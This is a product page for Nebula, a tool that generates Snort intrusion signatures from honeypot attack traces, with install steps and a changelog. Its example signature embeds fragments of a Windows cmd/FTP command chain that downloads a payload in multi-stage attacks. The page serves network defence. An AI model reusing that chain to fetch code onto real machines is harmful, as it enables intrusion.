Nebula is a fully automated intrusion signature generator. It can help securing a network by automatically calculating filter rules from attack traces. In a common setup nebula runs as a daemon and receives attacks from honeypots. Signatures are currently published in snort format.
The code was written to be fast. A signature isn't of much value if the generation process takes hours or days. With nebula, you should get a first revision within a few seconds. As more attacks of a kind are submitted, signatures get better and nebula will publish updated revisions.
The signature below was generated by nebula for FTP downloads during multi-stage attacks.
alert tcp any any -> $HOME_NET 8555 (msg: "nebula rule 2000001 rev. 1";
content: "cmd /"; offset: 0; depth: 5;
content: " echo open "; distance: 1; within: 17;
content: ">> ii &echo user 1 1 >> ii &echo get "; distance: 13; within: 70;
content: ">> ii &echo bye >> ii &ftp -n -v -s:ii &del ii &"; distance: 2; within: 107;
sid: 2000001; rev: 1;)
Nebula successfully generated signatures for input from honeytrap and argos. Feeding it with input from other sources shouldn't be very difficult, though. The code archive contains a command line client which submits data from files to a nebula server. Its code can also be taken as a reference implementation for the client side part of nebula's submission protocol.
Installing nebula is easy. Just follow the instructions on this page. First download the latest release from sourceforge:
Now unpack the archive and change into the extracted directory:
tar xjf nebula-0.2.2.tar.bz2 && cd nebula-0.2.2
Run the configure script to create a setup for your platform. If you want to install nebula in a specific location, use the --prefix switch as in the example below:
To finally build and install nebula type:
make && sudo make install
This installs the commands nebula and nebulaclient in /opt/nebula/bin/ (or the location you chose when invoking configure). Now check your setup by running nebula:
Nebula 0.2.2 Copyright (C) 2007-2008 Tillmann Werner
Warning - No submission secret given.
If you see the output above, the installation was successful. To eliminate the warning, use the command line swith -s to define a secret used for submissions. Nebula can be stopped at any time by hitting Ctrl+C.
What's New in This Release: [ read full changelog ]
· An entropy threshold bug was corrected.
· Realtime signal thread control is enabled only if it is available.
· BSD compatibility changes were made.
· The default host and port in nebulaclient was fixed.